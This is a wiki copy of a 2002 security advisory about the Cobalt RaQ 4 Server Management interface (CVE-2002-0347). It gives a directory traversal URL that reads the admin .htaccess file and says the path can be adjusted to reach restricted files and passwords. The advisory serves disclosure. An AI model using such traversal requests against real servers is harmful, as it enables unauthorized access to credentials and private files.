Pwnwiki: Created page with "==INFO==

 ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo----------------   Company..."

2021-03-31T07:16:14Z

Created page with "==INFO== <pre> ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company..."

New page

==INFO==
<pre>
------oOo----------------
Cobalt RAQ 4 Server Management,
Cross Site Scripting , Directory Traversal & DoS Vulnerabilities.
------oOo----------------

Company Affected: www.cobalt.com & www.sun.com
Version: RAQ 4 Server Management.
Dowload: http://www.cobalt.com/products/raq/index.html
OS Affected: Linux ALL, Solaris ALL.

Author:

** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

----=[Brief Description]=------------

Traversal File configuration.

Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u
can translate to any directory for capture restricted files or passwords
and profiles the users.

Vendor Response:
The vendor was notified

Posted List^s Security cobalt:
cobalt-security@list.cobalt.com &
jlovell@sun.com

http://www.cobalt.com

Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.

------oOo------------------------------------
</pre>

CVE-2002-0347 Cobalt RAQ 4 Server 目錄遍歷漏洞 - Revision history

Pwnwiki: Created page with "==INFO==
------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company..."